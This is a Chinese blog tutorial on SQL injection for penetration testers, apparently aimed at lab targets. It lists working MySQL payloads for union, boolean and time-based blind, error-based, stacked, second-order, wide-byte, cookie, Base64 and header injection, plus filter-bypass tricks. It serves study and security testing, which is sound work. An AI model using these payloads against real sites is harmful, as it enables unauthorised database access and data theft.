渗透测试之SQL注入

最新推荐文章于 2025-05-29 16:20:30 发布
最新推荐文章于 2025-05-29 16:20:30 发布
阅读量1.2k 收藏 11
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 渗透 文章标签: SQL注入 Web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42477007/article/details/89639476

SQL注入基础

  1. SQL注入漏洞的产生需要满足以下两个条件:
    参数用户可控:前端传给后端的参数内容是用户可控的; 参数代入数据库查询:传入的参数拼接到SQL语句且带入数据库查询。
  2. 与MySQL注入相关的知识点

在MySQL5.0版本之后,MySQL默认在数据库存放一个" information_schema" 的数据库, 在该库中,我们需要记住三个表名 ,分别是"SCHEMATA、TABLES、COLUMNS"
需要记住的函数:

database():当前网站使用的数据库;
version():当前MySQL版本;
user(): 当前MySQL的用户;

注释符:# 或 --空格 或 /**/

内联注释符: /*! code */
常用注入语句:

union select 1,schema_name from information_schema.schemata                          爆库
union select 1,table_name from information_schema.tables where table_schema='库名'   爆表
union select 1,column_name from information_schema.columns where table_schema='库名' 爆列
union select 1,k0y from thiskey                           查看数据

SQL注入靶场

注入攻击

  1. Union 注入攻击
  #判断是否存在注入
http://43.247.91.228:84/Less-1/?id=1'    #后面直接加单引号,如果报错,可能存在注入
http://43.247.91.228:84/Less-1/?id=1  and 1=1   #返回正常
http://43.247.91.228:84/Less-1/?id=1  and 1=2   #返回错误 可能存在注入

#查询字段数
http://43.247.91.228:84/Less-1/?id=1  order by 1  #返回正常
http://43.247.91.228:84/Less-1/?id=1  order by 2  #返回正常
http://43.247.91.228:84/Less-1/?id=1  order by 3  #返回报错   字段数为2

#查询参数所对应的内容,然后将数据库的内容输出到页面
http://43.247.91.228:84/Less-1/?id=-1 union select 1,2  # 返回数字2
http://43.247.91.228:84/Less-1/?id=-1 union select 1,database()  #查询当前数据库
http://43.247.91.228:84/Less-1/?id=-1 union select 1,union select 1,table_name from information_schema.tables where table_schema='库名'   爆表
http://43.247.91.228:84/Less-1/?id=-1 union select 1,column_name from information_schema.columns where table_schema='库名' 爆列
http://43.247.91.228:84/Less-1/?id=-1 union select 1,k0y from thiskey                     查看字段
  1. Boolean 注入攻击
#判断是否存在注入
http://43.247.91.228:84/Less-5/?id=1'   #返回结果由yes 变成了 no  可能存在注入

#判断数据库的长度
http://43.247.91.228:84/Less-5/?id=1‘ and length(database())>=1--+  #1可以换为任何一个你觉得可能长度的数字
http://43.247.91.228:84/Less-5/?id=1’ and length(database())>=3--+  #返回yes
http://43.247.91.228:84/Less-5/?id=1’ and length(database())>=4--+  #返回 no 判断出数据库长度为3

#判断数据库库名
http://43.247.91.228:84/Less-5/?id=1’ and substr(database(),1,1)='t'--+   #判断第一个字符是否为 't' 是则返回yes
# substr 是截取的意思 't' 可以是任何一个字符 直到返回yes 就证明字符猜对了
http://43.247.91.228:84/Less-5/?id=1’ and substr(database(),2,1)='q'--+   #判断第二个字符是否为 'q' 直到判断出数据库名

#查询表名、字段名 将database() 换为(select table_name from information_schema.tables where table_schema='sql' limit 0,1)

http://43.247.91.228:84/Less-5/?id=1’ and substr((select table_name from information_schema.tables where table_schema='sql' limit 0,1),1,1)='e'--+

#依此类推直到推出所有的表名和字段名
  1. 报错注入攻击
    加 ’ 后报错:数据库语法错误
#获取当前数据库的库名
’ and updatexml(1,concet(0x7e,(select database()),0x7e),1)--+   #0x7e~ASCII编码

#接着继续获取数据库的表名字段名  方法同上,将database() 换为查询语句 并为查询语句加上 ()   
’ and updatexml(1,concet(0x7e,(select table_name from information_schema.tables where table_schema='sql' limit 0,1),0x7e),1)--+

SQL 注入进阶

  1. 时间注入攻击 #Boolean注入的进阶——时间盲注
    它与Boolean注入的不同之处在于,时间注入是利用sleep() 或 benchmark() 等函数让MySQL的执行时间变长。时间盲注多与IF(expr1,expr2,expr3)结合使用 含义是:如果expr1是 TRUE ,则IF()的返回值为expr2;否者返回值为expr3.
if (length(database())>=1,sleep(5),1) #如果数据库库名的长度大于1,则MySQL查询休眠5秒
#其他查询语句 与Boolean注入相似。将database() 替换为查询语句即可查询数据库的表名,列名,字段
  1. 堆叠查询注入攻击
    堆叠查询可以执行多条语句,多语句之间用分号隔开。堆叠查询注入就是利用这个特点,在第二个SQL语句中构造自己要执行的语句。首先访问id=1’ ,页面返回MySQL错误,在访问id=1’%23,页面返回正常结果。这里可以使用Boolean注入、时间注入、也可以用另外一种注入方式——堆叠注入
#注入语句
';select if(substr((database() limit 0,1),1,1)='e',sleep(3),1)%23
  1. 二次注入攻击
    #1.php页面的功能是注册用户名;也是插入SQL语句的地方;2.php页面的功能是通过id参数读取用户名和用户信息
   http://www.xxx.com.er/1.php?username=test 和
   http://www.xxx.com.er/2.php?id=10
   
   #第一步,访问1.php?username=test'
   返回结果是用户名test' 对应的id为21
   #第二步访问2.php?id=21;
   返回结果 报错:error in your SQL syntax
   #第三部 返回第一步访问1.php?username=test' order by 1%23
   返回一个新的id=32
   #第四步  再访问2.php?id=32
   返回空白页面
   
重复第三步第四步(改变order by 字段数,返回id也不同) 直到页面返回错误信息, 从而判断出字段数。
  1. 宽字节注入攻击
访问 id=1' 时 程序并没有报错,反而多了一个注意字符(反斜杠'\\');
当数据库编码为GBK时可以使用宽字节注入;
注入方式: id=1%df'%23          #先加%df再加‘    %23用来注释单引号;
因为反斜杠的编码是%5c,而在GBK编码中,%df%5c 是繁体字 "連";所以这时候单引号成功逃逸,报出MySQL数据库的错误;
接下来就可以用Union 查询,与Union注入一样。
  1. cookie注入攻击
 发现URL中没有GET参数,但是页面返回正常,这时我们使用Burp Suite 抓取数据包,如果发现cookie中存在id=1的参数,则可能存在cookie注入。
 用Burp Suite 修改cookie中的参数id=1 and 1=1   和 id=1 and 1=2,即可判断是否存在cookie注入。
  1. Base64注入攻击
发现id后面的参数经过base64编码,尝试参数后面加上一个单引号并一起转换成Base64编码
访问后页面返回错误 然后将参数改为 1 and 1=1 和 1 and 1=2 并且Base64编码, 查看访问结果; 判断是否存在注入
  1. XFF注入攻击
    XFF即HTTP请求头中的一个头部参数 X-Forwarded-for;它代表客户端真实的IP,通过修改X-Forwarded-for 的值可以伪造客户端IP

SQL 注入绕过

  1. 大小写绕过注入 例如: And aNd Order …

  2. 双写绕过注入 例如: anandd oorrder by…

  3. 编码绕过注入 例如:二次url编码

  4. 内联注释绕过注入 :

    id=1 /*!and*/ 1=1   
id=1 /*!and*/ 1=2
渗透测试sql注入
weixin_45380284的博客
03-05 929
sql注入 理论: 1.sql语言: 结构化查询语言 是一种数据库查询和程序设计语言 用于存取数据及查询、更新、管理关系数据库系统 常用的语句: 增:insert into <表名><列名>values(列值) 删:delete from <表名>( where<删除条件>) 改:update <表名> set <列名=更新值>(where<更新条件>) 查:select <列名>from<表名>(w
渗透测试——SQL注入
zjdda的博客
05-19 829
sql注入原理及实战
渗透测试SQL注入之【常规的SQL注入语句】这个渗透测试知识点教会你如何去做一些常规的sql注入
最新发布
qq_41314882的博客
05-29 959
SQL注入是一种常见的Web安全漏洞,指攻击者通过构造恶意SQL语句插入到输入参数中,使服务器执行非预期的数据库操作。本文介绍了SQL注入的原理、类型及常见测试方法: 注入原理:未过滤的用户输入直接拼接SQL语句,导致执行恶意查询 主要类型: 数字型注入:id=1 or 1=1 字符型注入:username='admin' or 1=1 # 搜索型注入:需闭合%符号 XX型注入:需闭合括号 检测方法: 单/双引号测试引号闭合 or 1=1返回所有数据 and 1=2返回空集 联合查询需匹配字段数 防御建议:
渗透测试-SQL注入
weixin_53696027的博客
02-05 2871
sql注入渗透测试重要的一部分,如果服务器存在sql注入漏洞将面临严重的威胁
个人笔记-渗透测试-SQL注入
weixin_48162696的博客
05-20 1179
SQL注入原理,sql注入的数据类型,sql注入的提交方式,手工注入sqlmap,基础防御,
渗透测试SQL注入(简介)
weixin_53958661的博客
12-18 3146
SQL注入简介,什么是SQL注入SQL注入的分类
33-33.渗透测试渗透测试SQL注入基于报错注入(下)
05-10
渗透测试渗透测试SQL注入基于报错注入(下)
29-29.渗透测试SQL注入基础(上)
05-10
渗透测试SQL注入基础(上)
渗透测试sql注入验证安全攻击性能
cc123489ll的博客
04-23 981
🍅文末有免费的配套视频可观看🍅,免费获取软件测试全套资料,资料在手,涨薪更快由于渗透测试牵涉到安全性以及攻击性,为了便于交流分享,本人这里不进行具体网址的透露了。我们可以在网上查找一些公司官方网站。
渗透入侵\超级SQL注入工具 SSQLInjection V1.0.zip
07-15
超级SQL注入工具 SSQLInjection V1.0
渗透测试——五、网站漏洞——SQL注入
热门推荐
钟言的博客
12-05 1万+
本篇为学习渗透测试第五课,网站漏洞即SQL注入,详细内容如下:一、走进DVWA测试网站 1、网站渗透测试步骤 2、DVWA网站 3、其他漏洞网站 4、进入DVMA网站 二、暴力破解和SQL注入 1、暴力破解 2、SQL语句 3、PHP语言 4、暴力破解页面之Burp Suite破解 5、暴力破解页面之SQL注入 6、SQL注入页面之 SQL注入 7、SQL注入(盲注)页面之 SQL注人 8、SQL注入(盲注)页面之SQLMap 自动注入等等
渗透测试SQL注入详解
weixin_50904074的博客
03-09 485
在JAVA、C等强类型语言中一般是不存在数字型注入的,因为在接受到用户输入id时,代码一般会做一个int id 的数据类型转换,假如我们输入的是字符串的话,那么这种情况下,程序就会报错。这里的id是可控的参数,正如我们输入1的时候,数据库执行的语句应为:select *from '参数或字段' where id = 1,但当我们输入1 ' 的时候,数据库的执行语句为select *from '参数或字段' where id = 1 '。sleep(n)会延时显示结果,且延时的时间为 n乘查询到的记录条数。
渗透测试-百日筑基—SQL注入篇&时间注入&绕过&HTTP数据编码&绕过—下
LANDUOSHUREN的博客
10-25 1504
SQL 注入绕过技术 已经是一个老生常谈的内容了,防注入可以使用某些云 waf加速乐等安全产品,这些产品会自带 waf 属性拦截和抵御 SQL 注入,也有一些产品会在服务器里安装软件,例如 iis 安全狗、d 盾、还有就是在程序里对输入参数进行过滤和拦截 例如 360webscan 脚本等只要参数传入的时候就会进行检测,检测到有危害语句就会拦截。但是在日渐成熟的 waf 产品面前,因为 waf 产品的规则越来越完善,所以防御就会越来越高,安全系统也跟着提高,对渗透测试而言,测试的难度就越来越高了。
Web安全渗透测试基础知识之SQL注入
玉笥寻珍的博客
05-11 1355
作为一名信息安全专业的学生,我在学习Web安全渗透测试过程中,对SQL注入进行了深入钻研,将理论知识与实战案例相结合,整理出这份学习笔记。首次发布的内容涵盖SQL注入基础理论、实战操作、常见问题及WAF绕过方法等核心要点。这是我学习笔记系列的开篇之作,后续还会持续更新更多Web安全知识,希望能与大家共同学习、交流进步,也欢迎各位前辈不吝赐教!
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
freeking101的博客
07-03 1万+
SQL注入就是将SQL代码插入或添加到 应用或者用户的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器,SQL服务器解析并执行篡改后的sql 并把结果返回。如果管理员没有对参数进行过滤,那么黑客可以通过数据传输点将恶意的SQL语句带入查询。
sqlmap工具:高效渗透测试SQL注入检测
针对SQL注入漏洞的渗透测试,目的是识别并修复可能被攻击者利用进行SQL注入攻击的漏洞。进行SQL注入渗透测试可以有效地发现和加固应用程序的安全性。 #### 3. sqlmap工具介绍 sqlmap是一个开源的自动化SQL注入和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值